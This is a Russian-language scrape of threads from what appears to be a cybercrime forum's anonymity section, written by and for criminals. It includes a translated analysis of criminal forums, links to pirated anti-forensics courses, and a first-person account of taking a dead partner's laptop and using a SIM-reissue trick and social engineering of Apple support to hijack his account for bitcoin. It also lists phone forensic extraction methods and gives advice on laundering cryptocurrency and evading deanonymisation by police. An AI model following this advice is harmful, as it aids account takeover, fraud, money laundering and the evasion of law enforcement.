площадкой для встреч злоумышленников. Они нарушают множество законов, в связи с этим часто исчезают незаметно. Многие считают, что форумы Hell и KickAss перестали функционировать именно поэтому (в 2015 и 2019 годах соответственно), хотя это не подтверждено властями. В иных случаях успехи правоохранительных органов освещаются в мировых СМИ. В сентябре 2019 года власти Беларуси арестовали серверы небезызвестного хакерского форума Xakfor. Сообщество киберпреступников хорошо осведомлено о присутствии властей на их форумах и о том, что некоторые из них существуют только потому что ценны для полиции - для сбора разведданных и доказательств.
С учетом того, что киберпреступники проводят множество транзакций и часто общаются на альтернативных платформах, можно ожидать, что потребность в форумах со временем уменьшится. Нельзя отрицать, что киберпреступники все чаще используют другие платформы; Digital Shadows даже написали об этом явлении: «[How Cybercriminals are Using Messaging Platforms](https://www.digitalshadows.com/blog-and-research/how- cybercriminals-are-using-messaging-platforms/)». Но рост альтернативных технологий не означает эпоху закрытия форумов, которые, кажется, процветают вопреки всему.

Доказательства: почему форумы по-прежнему популярны

Несколько факторов подтверждают идею о том, что форумы остаются с нами надолго. Постоянно появляются новые сайты, количество участников продолжает расти, а пользователи часто выражают нежелание отклоняться от традиционной модели. Появление новых форумов вызвано в основном необходимостью замены вышедших из строя.

Долой старье…

Англоязычная сфера киберпреступности в последние годы пережила примечательную нестабильность, когда существующие и только что зарождающиеся форумы постоянно исчезают по тем или иным причинам.

Вмешательство правоохранителей

Арест полицией или службами безопасности владельцев стали причиной прекращения существования большинства ныне не функционирующих форумов. Среди них был известный форум Dark0de, переведенный в автономный режим операцией под руководством ФБР в 2015 году. Dark0de работал с 2007 года и приобрел известность среди англоязычных киберпреступников благодаря обсуждению и продаже на сайте хакерских инструментов, эксплойтов, аккаунтов и рассылке спама. Другой жертвой стал давний [форум Infraud](https://www.digitalshadows.com/blog-and-research/infraud-forum- indictment-and-arrests-what-it-means/). На пике своего развития Infraud оказывал услуги услуг по взлому и мошенничеству операцию, заработав суммарно на полмиллиарда долларов, но в 2018 году форум закрыла международная правоохранительная коалиция.

Неадекватное поведение владельца / пользователя

Другие форумы погибли из-за халатности их владельцев. Например, мы видели сайты, покинутые их администраторами ― 0day являлся известной киберпреступной платформой, запущенной в начале 2014 года. Тем не менее, к концу 2017 года администраторы форума, очевидно, покинули ее. Наши запросы на регистрацию остались без ответа, а с Jabberа техподдержки никто не отвечал. Ходили слухи, что форум больше не работает: администраторы ушли, не выключив свет. На момент написания статьи, URL Tor форума больше не доступен, а клирнет URL исчез несколько лет назад.

Иногда некорректное поведение участников форума также может сыграть свою роль. Тот факт, что русскоязычные форумы намного успешнее, чем их англоязычные собратья, во многом объясняется невероятной дисциплиной русскоязычных платформ. Строгие правила определяют, какой язык можно использовать (брань запрещена, общаемся без грамматических ошибок), в какие разделы будут приниматься новые обсуждения и как следует обращаться с модераторами форума (оспаривать решение модераторов запрещено). Такие правила гарантируют порядок и предотвращают фрагментацию форумов из-за того, что участники вряд ли восстанут против администрации.

Плохое исполнение

Кроме того, есть форумы, которые проваливаются из-за плохой реализации со стороны их создателей. Torigon был запущен тремя злоумышленниками в сентябре 2019 года с явной целью объединить англоязычных и русскоязычных хакеров для обмена вредоносным ПО и эксплойтами на единой платформе. Но форум не смог обеспечить перевод на русский язык для людей, не говорящих по-английски, и не позаботился о продвижении сайта в сообществе. Результат? Отсутствие взаимодействия и неспособность достичь целевого рынка.

Новые форумы

Несмотря на значительную непредсказуемость, гибель англоязычных форумов не является неизбежной. Фактически, эту сцену лучше всего сравнить с игрой в «Ударь крота»: как только один форум исчезает, на его месте появляется другой. В киберпреступном андеграунде аппетит к новым форумам не уменьшается.
Необычайная стойкость форумов в англоязычном киберпреступном сообществе показывает, что злоумышленники по-прежнему видят большую ценность в использовании этих платформ. Создание нового форума требует значительных усилий и ресурсов, которые не гарантируют успеха. Иногда форумы, работа которых была остановлена полицией, даже пытаются вернуться, полагаясь на свой знаменитый бренд, чтобы повысить свой статус в глазах общественности ― ходили слухи о повторном появлении Hell (Hell Reloaded) и Dark0de.
Аппетит к новым форумам заметен даже у русскоязычных киберпреступников. Хотя их форумы и характеризуется удивительной стабильностью и долговечностью, иногда сайты действительно умирают… но не всегда навсегда. В 2018 году ранее существующий форум DamageLab был перезапущен как XSS. Благодаря опытной команде, стоящей за форумом, XSS вырос и стал бросать вызов даже самым известным русскоязычным ресурсам. А в марте 2019 года на форумах киберпреступников распространился новый слух: форум программистов Cult of the Russian Underground (CORU), бездействующий с 2016 года, будет возрожден. В апреле 2019 года CORU открыл регистрацию.

Сила в цифрах

Число участников форума и количество сообщений показывают, что популярность постоянно растет, несмотря на появление альтернативных платформ, вроде Telegram.

Torum

Torum был всего лишь маленьким, довольно незначительным игроком до 2018 года. Теперь все изменилось. 2019 год был очень удачным для Torum: за восемь месяцев с февраля по октябрь 2019 года его пользовательская база увеличилась на 639%, поскольку англоговорящие киберпреступники нашли новое место для группировки.

Exploit

Exploit - один из самых известных русскоязычных форумов для киберпреступников. Он работает непрерывно с 2005 года, и многие злоумышленники и обозреватели считают его платформой с самыми опытными киберпреступниками. Возможно, именно благодаря - своей долговечности и репутации, в последние месяцы количество участников Exploit значительно увеличилось. В марте 2018 года на сайте было зарегистрировано 40 390 пользователей. К ноябрю 2019 года их количество составило 47 347, что на 17,2 процента больше по сравнению с уже существовавшими. Фактором, способствовавшим этому, могло быть решение ввести автоматическую регистрацию на английском языке, чтобы облегчить присоединение зарубежных пользователей. Количество сообщений Exploit выросло с 846 020 в марте 2018 года до 1012 575 в ноябре 2019 года.

XSS

XSS (DamageLab): один из первых русскоязычных форумов для киберпреступников. DamageLab закрылся после ареста администратора в 2017 году. Тем не менее, бывший администратор Exploit приобрел бэкап XSS в конце 2018 года и с тех пор превратил форум в процветающее и активное сообщество, что отражается в его растущем числе участников. В период с февраля 2019 года (10 344 члена) по ноябрь 2019 года (19 040 человек) их число увеличилось на 84 процента. И давайте не будем игнорировать количество сообщений, которое выросло со 130 040 до 162 470.

Количество посещений также свидетельствует о том, что популярность форумов остается стабильной. Количество посещений двух популярных англоязычных форумов киберпреступников, Nulled и Raidforums, практически не уменьшилось с апреля 2019 года, согласно сайту показателей посещений SimilarWeb [.] Com. По данным того же сайта, количество посещений Exploit за тот же период увеличилось более чем на 20 000 человек.

Теперь, когда у нас есть несколько примеров известных форумов, каковы их альтернативы? Что делает форум хорошим? Во второй части этой серии блогов мы обсудим то, почему пользователей форума не хотят отходить от модели форума.
Оставайтесь на связи.

Udemy | За тобой не прийдут с болгаркой v2. Volume 1 & 2

ID: 676533bbb4103b69df371c64
Thread ID: 46067
Created: 2020-12-27T11:55:30+0000
Last Post: 2020-12-29T15:38:46+0000
Author: 0D1UM
Prefix: Мануал/Книга
Replies: 22 Views: 4K

Чему вы научитесь в данном курсе:

Анонимность
Конфиденциальность
Безопасность

О курсе:

Автор курса: Mefodiy Lelevra
Общая продолжительность курса: 18 ч 30 мин.
Качество видео: PCRec
Язык озвучки: Русский

В курсе рассмотрены следующие темы:

Антифорензика
Шифрование
Мессенджеры
Технологии VPN
Самоуничтожение
Что делать Если уже пришли с болгаркой
Анонимная Экономика
План отдохода.

Скачать:

Hidden content for authorized users.

![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- folder.png&hash=63d46597e69ae4a51888711a37d2bf45&return_error=1)

[ 11.2 GB folder on MEGA

](https://mega.nz/folder/AM4UBLyb#G9Vw97NcRJHdvE5z0x7YzQ)

78 files

mega.nz mega.nz

Macbook на $1,5 млн и Криминальная форензика Apple-устройств

ID: 676533bbb4103b69df371c7b
Thread ID: 43730
Created: 2020-10-30T14:54:47+0000
Last Post: 2020-11-14T12:14:49+0000
Author: rokkkkkko
Prefix: Статья
Replies: 11 Views: 4K

Изначально хотел написать статью о фишинге и методах социальной инженерии, но потом, в самом низу списка категорий увидел слово «форензика» - довольно не популярный, но безумно важный раздел для каждого интернет-«предпринимателя». Тем более, эта тема, идеально ложится на одну из историй о которой я поведаю ниже. Пополним же раздел форензики, поехали.

Я не работаю в структурах, которые занимаются форензикой, но в связи с ситуацией, о которой кратко расскажу ниже - мне пришлось лично изучить всё это.

Москва, осень, поздний вечер, уже сутки как мой партнер «по делам», не читает мое сообщение, отправленное ему в мессенджер. Я начинаю немного волноваться и строить различные ситуации в голове, затем решаю ехать прямо к нему домой. Последние два месяца он плотно подсел на белый и его не останавливала простуда и температура 38+. Смотрю с улицы – 13 этаж, свет горит – значит он дома. Поднимаюсь и начинаю звонить в звонок, одна минута, пять минут – в квартире ноль движения. Я снова прозваниваю его телефон, не в сети. Спускаюсь к консьержу узнать, когда последний раз выходил, с кем и во сколько – не выходил неделю, вчера приходил курьер из супермаркета. Начинаю волноваться, беру у консьержа номер его отца, у него был только отец, они толком не общались и жили раздельно. С отцом я познакомился, молча поднимаясь в лифте на 13-ый этаж, мы оба понимали, что нас ждет за дверью. Заходим в хату – везде включен свет, в спальне пусто, в гостиной пусто, в туалете пусто, открываем дверь во второй саунзел – он лежит на полу, мертвый. Молча, без эмоций, проверяем тело – холодное. Отец звонит в скорую, я отхожу звонить другим нашим партнерам «по делу». В какой-то момент у меня «щелкает» в голове, я отключаю телефон и включаю хладнокровие. На его макбуке куча информации которая может очень навредить мне и остальным коллегам, прямо очень навредить. Помимо этого, на компе 1password с ключами от бтц-кошельков с балансом примерно 1 500 000 долларов от части заработанных вместе. Начинаю курсировать по квартире методично разглядывая все уголки в поисках компьютера. Хорошо было бы забрать телефон – но это будет слишком, отсутствие компьютера можно объяснить тем, что он в ремонте, а вот телефон – палево. Цепляю макбук под кофту, спускаюсь на улицу покурить и кладу его в машину.

Не буду растягивать историю, статья не об этом, но итог драматичный – отёк легких + кокс = остановка сердца. У меня выключенный Macbook Pro 2019, с паролем который я не знаю и зашифрованный FileVault’ом второй версии. Можно было бы просто его сжечь и забыть, но полтора ляма в биткоинах не позволяли мне это сделать. Решил попытаться его расшифровать.

**Предпринятые мной действия и методы социальной инженерии – не пригодятся мусорам, они добудут информацию официальными запросами, имейте это в виду.

Я изучил тонну информации о Filevault и iOS/MacOS, исходя из этих данных сформировался такой план:

Получить доступ к AppleID, извлечь из него максимум полезной информации и Filevault Recovery Token для последующей расшифровки ноутбука. На следующий день, в салон сотовой связи был отправлен человек, чтобы «восстановить» утерянную сим-карту, предварительно пополнив ее и рассказав работнику салона последние звонки, вечером перевыпущенная сим-карта у меня в руках. Сбросить пароль от AppleID обычной смс-кой не получилось, так как Apple потребовал подтвердить сброс с помощью других устройств которые привязаны к этому AppleID, их у меня конечно же нету, не считая макбука который зашифрован.

Тут в ход пошла социальная инженерия и прозвон технической поддержки Apple, правдами и не правдами мне сбросили пароль, доступ к аккаунту я получил. Далее этот AppleID был мною введен на заранее купленном iPhone XS и у меня получилось восстановить полную резервную копию айфона моего партнера на новое устройство. Все фото, заметки, пароли, история браузера и даже secret key от 1password подгрузился из облачной копии (лол, безопасность).

Плавно переходим к информации о том, какую информацию смог получить я и которую смогут получить работники отдела «К» из вашего айфона. Топовые форензик-конторы постоянно обновляют софт и на данный момент поддерживают все прошивки, в том числе iOS 14.

Что можно извлечь, зная логин и пароль от iCloud

- Извлечение резервных копий всех устройств, привязанных к iCloud. Данные извлекаются низкоуровневым методом, который извлекает даже те данные, которые невозможно извлечь через официальный API. Сразу закрадывается мысль, «я отключу айклауд и красноперые отсосут», но ребят, не в этот раз – софты извлекают также и локальные резервные копии, как с заблокированного телефона, так и с пк на котором установлен iTunes. Тот же софт, из коробки, поддерживает методы распределенной (посредством подключения, по-моему 100+ AMD/NVIDIA видеокарт) брутфорс атаки по словарям, с мутациями и прочими методами «умного» брутфорса, на резервные копии которые зашифрованы паролем.

- Извлечение связки ключей Keychain в расшифрованном виде. То самое защищенное хранилище паролей на iOS/MacOS.

Данные в виде: сайт | логин | пароль | дата создания | дата изменения

- Резервная копия Whatsapp

- Синхронизированные данные из: Фотопленка, Файлы, Apple Maps, Календари, Информация об аккаунте Эплайди, Контакты, История звонков, СМС, Здоровье, iBooks, Заметки, Браузер Safari со всей историей посещений, Записи диктофона, Wallet (всё, кроме платежных карт) и довольно таки подлая штука – данные о wi- fi точках к которым подключалось устройство – абсолютно вся история.

- Извлечение FileVault Recovery Token, об этом расскажу ниже.

- Про извлечение данных из таких сервисов как Skype (переписки, контакты, вложения, история звонков) и дефолтный Mail на iOS, я писать не буду, так как большинство людей из сферы не пользуются этим, но имейте в виду.

Что можно извлечь, не зная логин и пароль от iCloud, но имея доступ к компьютеру, с которым устройство было синхронизировано хоть раз

Если на ПК был установлен iCloud, то из него можно извлечь особый маркер аутентификации и с помощью него также выгрузить часть данных из учетки айклауда, набор доступных к извлечению данных очень зависит от версии iOS которая была установлена на устройстве.

Что можно извлечь из заблокированного iOS-устройства

Начну с того, что на iPhone 5 и 5C с неизвестным кодом блокировки, пароли подбираются брутфорсом через баг DFU-режима.

4-символьный пасскод – 12 минут на подбор;
6-символьный пасскод – 21 час.

Частично извлечь данные можно из заблокированного устройства с неизвестным пасскодом начиная от iPhone 5 и до iPhone X включительно. В том числе, геолокационные данные из Google.Maps, а также почти всю информацию которую пользователь вводит на клавиатуре в своем устройстве.

Кстати, у Apple есть такое понятие как Lockdown-файл и вот как его можно эксплуатировать. Из компьютера, к которому был подключен iPhone, можно извлечь lockdown-файл, с помощью него можно снять пароль блокировки айфона. Есть одно «но», это сработает в том случае, если с момента последнего подключения к ПК, айфон не разу не перезагружался.

**Табличка «зависимостей» и состояний:

Что можно извлечь из разблокированного iOS-устройства

В программных комплексах для криминалистического анализа (форензики) есть решения с помощью которых, как минимум можно извлечь полный образ файловой системы условного айфона, для дальнейшей ее обработки и изучения изнутри. Процесс довольно интересный:

Регистрируем AppleID, оплачиваем аккаунт разработчика (100$). Подключаем разблокированное устройство шнуром к ПК на Windows с установленным софтом Elcomsoft iOS Forensic Toolkit и переходим в меню "Acquisition agent", указываем логин и пароль от созданного нами аккаунта разработчика и на целевое устройство устанавливается программа-агент, с помощью которой можно «изнутри» выгрузить ВСЮ файловую систему в формате TAR.

Полученный образ файловой системы мы грузим в софт для просмотра и анализа, есть два топовых решения, которые выдают разные результаты – Oxygen Forensic и Elcomsoft Phone Viewer. Обрабатываем полученный образ и видим результат.

Помимо сообщений из Телеграм, в т.ч. секретных чатов, можно будет почитать чаты из ранее «безопасного мессенджера» Signal, а также Viber, WeChat, etc. История поиска, Календари, Звонки, СМС, Вай-фай точки, Контакты, WebKit Data, данные FaceID и прочее.

Связку ключей, также можно дампнуть.

Продолжение и итог истории

История продолжается по сей день..

Я перелопатил все фото, заметки, пароли и ничего из этого не подошло в качестве пароля к Macbook, я извлёк Filevault Recovery Token для расшифровки, но столкнулся с непредвиденной проблемой. Macbook Pro начиная от, вроде как, 2018 года, сконструированы так, что жесткий диск, по дефолту, припаян к материнской плате и его просто так не извлечь. Система загрузчика MacOS построена таким образом, что без валидного введенного пароля от учетки – жесткий диск с Filevault не монтируется , соотвественно даже физическую копию снять довольно проблематично.

Сейчас я застрял на этом этапе и ищу способы как сделать полную копию зашифрованного раздела на внешний носитель. Как только это будет сделано, я загружу образ в программу Elcomsoft Disc Decryptor и с помощью извлеченного ранее Recovery Token, расшифрую систему.

Эпилог

Не болейте, если болеете – лечитесь, не лечитесь коксом, храните данные в криптоконтейнерах.

Я постарался дать максимум полезной информации о том, какие данные можно достать из устройств Apple, сквозь призму довольно грустной реальной истории которая имела место быть ровно год назад. Имейте это в виду, когда продумываете безопасность своих данных на случай маски-шоу и изъятия техники.

В процессе «иследования» я использовал софт: Elcomsoft Phone Breaker, Elcomsoft iOS Forensic Tool, Elcomsoft Disc Decryptor, Oxygen Forensic Tool.

Надеюсь, текст вышел удобным для чтения, готов отвечать на ваши вопросы.

Как я делал свой браузер безопасным

ID: 676533bbb4103b69df371ce4
Thread ID: 30270
Created: 2019-07-08T08:47:30+0000
Last Post: 2020-04-23T02:16:41+0000
Author: 2c71e9
Replies: 12 Views: 4K

Расскажу как я себе сделал чуток безопасный браузер, вы тож делитесь вашими поделками.

Сижу я на линуксоподобных системах, Особо ни чего не хочется ставить не из репозитория. Но хочется чтобы и тор работал и капчи не заебывали и так далее. В общем я взял за базу Firefox.

Что было с ним сделано:

В настройках включаем очистку всего и вся, по закрытию бзаузера.
Ставим плагины : foxyproxy, expressvpn (любое на ваше усмотрение), cokkie auto delete, noscript

Настройка foxyproxy :
Настраиваем цепочка ну все onion а так же на все форумы и сайты по маске site на 127.0.0.1 : 9050 socks5

Настройка VPN :
Включение впн если не был включен, когда браузер открывается

Настройка NoScript :
Блокируем все особенно все рабочие форумы и другие вещи, почти все песочницы работают на js. А сайты спокойно и без js серфятся.

Настройка cokkie auto delete :
Удаление всего по закрытию вкладки включая локальное хранилище. Это нам даст то что если даже открыть второй раз сайт мы зайдем туда как аноним, хоть и со старым IP

Ну для параноиков можно еще поставить agent spoofer

P.S. ну и не забывает блокировать WebRTC. А самое главное не ставьте херову тучу плагинов. По ним можно легко получить слепок. ^_^ Вот такой мини гайд.

Постквантовая криптография и применение ИИ в криминалистике

ID: 676533bbb4103b69df371cf7
Thread ID: 35281
Created: 2020-03-01T17:15:54+0000
Last Post: 2020-03-21T09:19:44+0000
Author: Chook
Prefix: Статья
Replies: 9 Views: 4K

1 часть статьи, самая главная
2 часть статьи, про реально анонимную OS
Часть 3
Постквантовое шифрование
Вероятно, кто то уже знают, что АНБ сохраняет весь зашифрованный трафик проходящий через сеть интернет, для того, чтобы в случае прорыва в области криптографии, расшифровать его. Так вот, считается, что через 10-15 лет квантовые компьютеры уже смогут решать сложные задачи. В частности, расшифровывать сообщения. Большенство алгоритмов, которые сейчас мы все используем(https, gnupg, RSA, DSA и тд) можно будет расшифровать. А другие, например AES в двое потеряют свою надежность (256 в 128 бит, 128 в 64, и тд) И для того чтобы его все еще нельзя было бы взломать, нужно иметь ключ с очень большой энтропией. Однако не все так плохо как может показаться на первый взгляд. Хотя большенство алгоритмов уже нельзя будет считать стойкими. Возможно, не все так легко будет взломать. Чем труднее будет алгоритм расшифровки, тем более совершенный должен быть квантовый компьютер(например один алгоритм можно будет расшифровать уже лет через 5, другой через 10, а возможно особо стойкие алгоритмы с большой битностью еще продержаться лет 30-40).
Что в связи с этим делать? Ну во-первых не болтай, даже в зашифрованной переписке. Рассчитывай что ее через какое то время смогут прочитать заинтересованные люди. Также в уязвимых перед квантовым компьютером алгоритмах, стоит выбирать максимальную битность, это тоже повышает стойкость, возможно именно это поможет «отолжить» расшифровку на лет на десять.
Насколько уязвим Tor перед квантовой атакой? На самом деле все одновременно и очень плохо и в то же время, относительно надежно. Почему все плохо? Просто сохранив трафик входной/выходной ноды, с помощью квантового компьютера можно будет снять все 3 слоя шифрования и узнать ваш ip. Почему не настолько критично, ну во-первых пройдет 10 лет, во-вторых алгоритмы в tor работают с избыточной на данный момент надежностью, а это значит что уровень развития квантового компьютера должен быть существенно выше чем для расшифровки рекомендуемых алгоритмов. Например, соединение с устаревшей, короткой onion ссылкой зашифровано с использованием RSA(1024 бит). То современные луковые сервисы зашифрованы шифром эквивалентом по надежности с RSA(~3072 бит). А это требует куда более совершенной квантовый компьютер.
Итог:
1. Считай что tor анонимен(ничего лучше быть не может), разве что сидеть под инетом так, чтобы через 10-15 лет нельзя было сказать что ты работал из под этой точки(не должно сохраниться физических следов вашего прибавления на месте)
2. Как станет ясно, что атака с помощью КК уже скоро может быть использована, поменяются все стандарты, и разумеется tor их будет использовать.
3. Как вариант, в особо критичных ситуациях использовать что то типа tor -> что то одноразовое на что прилетит абуза. Это может помочь от того, что просто запишут трафик с выходной ноды, что не требует уже практически никакой мощи от противника. То есть с использованием подобной цепочки, тебя смогут вычислить кто угодно, а не только АНБ.(Как пример, ФСБ вычисляет телефон по базовым станциям, а рядовой мент такого не делает)
4. Можно использовать постквантовые алгоритмы шифрования, но вся проблема в том, что их мало, они не распространены(это мешает вашей анонимности), реализации этих алгоритмов не проверены профессиональными криптографиями.

2. Хотя я буду использовать термин ИИ(искусственный интеллект), под ним я на самом деле имею ввиду ML(машинное обучение).
Не буду нагружать вас теорией, ее, если хотите можете прочитать, на википедии. Но немного расскажу, что может делать ИИ, а чего не может.
Ну начнем с того, что для создания ИИ, необходимо большое количество данных(Чем сложнее алгоритмы, тем больше этих данных нужно). Причем то как этот ИИ будет работать, очень сильно зависит от качества и количества этих данных.
Для вашей деанонимизации, необходимо, иметь какое то количество ваших индификаторов(об этом позже). То есть он не может взять информацию из ничего, должна быть хотя бы какая то связь, хотя бы теоретически.
Так же хотелось бы заметить, что ИИ плохо работает с шумами, то есть если добавить мусора в данные, то ИИ их скорее всего плохо их обработает.

Spoiler: Коротко про Big Data

Инструменты Big Data не заменят существующие, но будут выступать в качестве дополнительного ресурса для повышения эффективности принятия решений в области компьютерных преступлений.
С помощью "переидентификацией" можно деанонимизировать пользователей даже на обезличинных данных, так же с помощью социального графа уже вычисляют преступников(у них были общие друзья на facebook, то же можно использовать и для деанонимизации пользователей xmpp)

(Форензика - компьютерная криминалистика)
Начнем с того, что больше всего доказательств собирают с жесткого диска подозреваемого. На следующем месте идет сетевой трафик. Но даже если этих следов нет, и мы все затерли, они могут попробовать доказать, что преступление было совершенно с этого оборудования(id оборудования, расширение экрана и тд).
Где же будут применять ИИ? Ну во-первых его будут использовать для полу автоматического сбора улик с вашего пк. Он будет сам классифицировать документы, сможет найти спрятанные с помощью стенографии контейнеры, сопоставит скрытые артефакты(грубо говоря логи). Но я не вижу смысла об этом рассказывать подробнее, так как это все и так можно найти в ручном режиме, разве что теперь не стоит надеяться что им не хватит ресурсов для анализа улик(как это часто происходит сейчас особенно в СНГ).

Уже сейчас ИИ кое как понимает абзацы текста, то есть уже можно автоматический просканировать весь инет, и создать профиль каждому пользователю. Выделив все факты, что он писал(Как пример, вы выложили скриншот на хакерской форум, тем самым спалили, что работаете на macbook, из за нестандартного разрешения, и спалили тайм зону. А на каком то другом форуме, вы попросили помощи в переходе с macbook на PC, а так же тот факт что вы програмист, эти два профиля уже можно связать)
Пример результата работы алгоритма:
![Пример работы алгоритма](/proxy.php?image=http%3A%2F%2Fwww.pvsm.ru%2Fimages%2Fizvlechenie- obektov-i-faktov-iz-tekstov-v-yandekse-lekciya-dlya-malogo- shada-5.jpg&hash=6b8eb57926c20ca1fb7c27acd415743d)
ML Fingerprint
Это наверное одно из самых важных разделов. Это то что, что реально угрожает вашей анонимности, та информация о вас, которую можно достать только с помощью ИИ.
Приведу вам парочку примеров:
1. По длине пакетов, можно определить какой вы сайт открыли. Тут не поможет, даже Tor, который показал лучший результат.
2. Определить авторство текста/исходного кода. Для этого нужно как можно больше текста связанного с одним пользователем(то есть пишите как можно меньше, делайте это с разных аккаунов). Пишите в разных стилях, это может вам помочь. Если пишите текст, проверяйте его на ошибки, они больше всего вас выдают. Так же можно выяснить какой родной язык у автора текста.
3. По тому как человек печатает, тоже можно его деанонимизировать. Определить вероятный родной язык. Тут поможет либо рандомизация с помощью Kloak(скрыть факт его использования не получиться), либо отключение скриптов. Или что еще лучше, пишешь в текстовом редакторе, потом вставляешь в поиск.
4. Аналогично по движению мышкой
5. Деанонимизация пользователей bitcoin, определение «грязных» денег(определение к какой категории относиться транзакция «Биржа», «Азартные игры», «рынок DarkNet» и тд). К стати, то же самое сейчас пытаются делать в банках. Но вся проблема в том, что мошеннических операций всего ~1%, а нужно чтобы доля каждого класса была >10%. Так же много транзакций не отмечено как мошеннические, тк по ним нет жалоб. С этим пытаются что то делать, например пытаясь выявить отличающиеся от обычных операции, но пока ничего особо не выходит. Когда и получиться ли у них вообще что то, пока не понятно.
Совет: не стоит, наверное, обналичивать btc и анонимные криптовалютывалюты, тк их в даркнете используют больше всего. Как по мне лучше вывести какие нибудь популярные альткоины.
Если у вас будет цепочка monero -> что то не анонимное -> что то не анонимное, то вероятность того что вы получите грязные деньги становиться сильно меньше. Еще можно отправлять деньги самому себе, холдить их. Все это может помочь в обмане ИИ. Ну смотрите, какой ip светиться. То что у вас анонимный ip говорит о том, что вы скрываете свою личность.
6. Определить ваш «профиль», это происходит с рекомендациями на ютубе. Поэтому лучше всего с аккаунта продавца не сидеть нигде, кроме своей темы.
7. На примере jabber, по тому когда вы онлайн и по времени отправки сообщений, размеру сообщений, по вашим собеседникам, возможно тоже можно будет вас деанонимизировать. Тут поможет разве что частая смена акков(с каждого из них общайтесь только с одним человеком, чтобы было нельзя построить социальный граф), причем это должны делать все ваши собеседники, а не только вы. Время которое акк будет активным тоже стоит выбирать с помощью рандомизатора, чтобы небыло никакой системы. Можно быть онлайн только в конкретные часы.
Как вариант, не вести «неанонимную цифровую жизнь», тогда, если и определят всю вашу сферу деятельности, не смогут вас до конца деанонимизировать
Будьте особенно аккуратны, когда работаете из под той «личности» откуда вас начнут раскручивать. Определение грязных биткоинов, опиралось на транзакций на счета вымогателей.
Итог: чем меньше инфы у вас привязанно к одному профилю, тем лучше. Для использования большого количества профилей удобно использовать Qubes. О чем было рассказано во второй статье.
P.S. Другие применения ИИ не относящиеся к теме:
1. По тому как часто вызывается функция шифрования, можно отличить Ransomware от легитимного софта.
2. В облаках антивирусов, применяют ML для оценки подозрительности файла, на joesandbox.com - хотя они не пишут, но вероятно применяется ML для детекта неизвестной малвари по ее поведению.
3. Автоматический детект фишинг сайтов и ip ботнетов
4. Ниже пример сгенерированного кода с помощью ИИ, правда тут не стояло задачи, чтобы он был компилируемым

C:Copy to clipboard

/*
* Increment the size file of the new incorrect UI_FILTER group information
* of the size generatively.
*/
static int indicate_policy(void)
{
  int error;
  if (fd == MARN_EPT) {
    /*
     * The kernel blank will coeld it to userspace.
     */
    if (ss->segment < mem_total)
      unblock_graph_and_set_blocked();
    else
      ret = 1;
    goto bail;
  }
  segaddr = in_SB(in.addr);
  selector = seg / 16;
  setup_works = true;
  for (i = 0; i < blocks; i++) {
    seq = buf[i++];
    bpf = bd->bd.next + i * search;
    if (fd) {
      current = blocked;
    }
  }
  rw->name = "Getjbbregs";
  bprm_self_clearl(&iv->version);
  regs->new = blocks[(BPF_STATS << info->historidac)] | PFMR_CLOBATHINC_SECONDS << 12;
  return segtable;
}

Spoiler: еще пример кода

C:Copy to clipboard

/*
* If this error is set, we will need anything right after that BSD.
*/
static void action_new_function(struct s_stat_info *wb)
{
  unsigned long flags;
  int lel_idx_bit = e->edd, *sys & ~((unsigned long) *FIRST_COMPAT);
  buf[0] = 0xFFFFFFFF & (bit << 4);
  min(inc, slist->bytes);
  printk(KERN_WARNING "Memory allocated %02x/%02x, "
    "original MLL instead\n"),
    min(min(multi_run - s->len, max) * num_data_in),
    frame_pos, sz + first_seg);
  div_u64_w(val, inb_p);
  spin_unlock(&disk->queue_lock);
  mutex_unlock(&s->sock->mutex);
  mutex_unlock(&func->mutex);
  return disassemble(info->pending_bh);
}

static void num_serial_settings(struct tty_struct *tty)
{
  if (tty == tty)
    disable_single_st_p(dev);
  pci_disable_spool(port);
  return 0;
}

static void do_command(struct seq_file *m, void *v)
{
  int column = 32 << (cmd[2] & 0x80);
  if (state)
    cmd = (int)(int_state ^ (in_8(&ch->ch_flags) & Cmd) ? 2 : 1);
  else
    seq = 1;
  for (i = 0; i < 16; i++) {
    if (k & (1 << 1))
      pipe = (in_use & UMXTHREAD_UNCCA) +
        ((count & 0x00000000fffffff8) & 0x000000f) << 8;
    if (count == 0)
      sub(pid, ppc_md.kexec_handle, 0x20000000);
    pipe_set_bytes(i, 0);
  }
  /* Free our user pages pointer to place camera if all dash */
  subsystem_info = &of_changes[PAGE_SIZE];
  rek_controls(offset, idx, &soffset);
  /* Now we want to deliberately put it to device */
  control_check_polarity(&context, val, 0);
  for (i = 0; i < COUNTER; i++)
    seq_puts(s, "policy ");
}

P.S. От ML может помочь Qubes и мозги. От квантового компьютера защиты на данный момент нет, но и не очевиден тот факт, что он сможет все поломать. Разрабочики tor пометили критичность этой уязвимости как «обычную».
А по факту то ловят «хакеров», по глупости, их небрежности или если они профессионалы, то по их ошибкам. Но от этого можно защититься грамотной настройкой qubes, жесткой изоляцией работы и неанонимной жизни, ну и грамотным поведением, о чем я писал в первой части статьи.
Если вы все это исполняете, и у вас не осталось следов с «неанонимной» работы, то вас вероятно, не найдут, но найдут ваших коллег. Поэтому даже с ними особо откровенничать не стоит

Проблематика Tails

ID: 676533bbb4103b69df371d10
Thread ID: 32102
Created: 2019-09-28T18:18:46+0000
Last Post: 2019-11-04T15:00:55+0000
Author: AEIOU
Replies: 23 Views: 4K

искал информацию
не нашел
flathub не запускается
пытался попросить добрых людей разбить курс Paranoid на две части в mega.nz (потому что операционная система виснет из за файла размером в 1.7 GB который загружается сначала на самом сайте и только после скачивается в выбранную папку) или перезалить его к примеру на яндекс диск
послали на*уй
(большое всем вам и огромное спасибо за это)
(я очень много чему научился и очень много чего осознал и узнал тоже)
других методов не знаю

Слив The Codeby | Курс по анонимности и безопасности в сети интернет

ID: 676533bbb4103b69df371d1b
Thread ID: 31086
Created: 2019-08-15T11:53:09+0000
Last Post: 2019-10-14T16:04:12+0000
Author: nullx
Prefix: Видео
Replies: 9 Views: 4K

Описание курса:

● 1. Вступление

Оглавление

1.1 Введение

1.2 Windows или Linux - Извечный вопрос

1.3 Как мы светим железо

I часть

● 2. Live-системы

2.1 Как стереть жесткий диск, используя DBAN

2.2 Tails (video)

2.3 Возможность настройки сохранения данных и программ в постоянном хранилище

Persistence в Tails

2.4 Как использовать Tails вместе с SSH

● 3. Виртуальные машины

3.1 Whonix_Gateway (video)

3.2 Whonix_Workstation (video)

3.3 Установка и настройка Whonix

3.4 Реализация различных цепочек анонимности

● 4. Operation System

4.1 Kali_Linux (video)

4.2 Kali_Linux

4.3 Kali_Linux_recovery (video)

4.4 Self Termination Script + scripts

● 5. Дополнительный софт

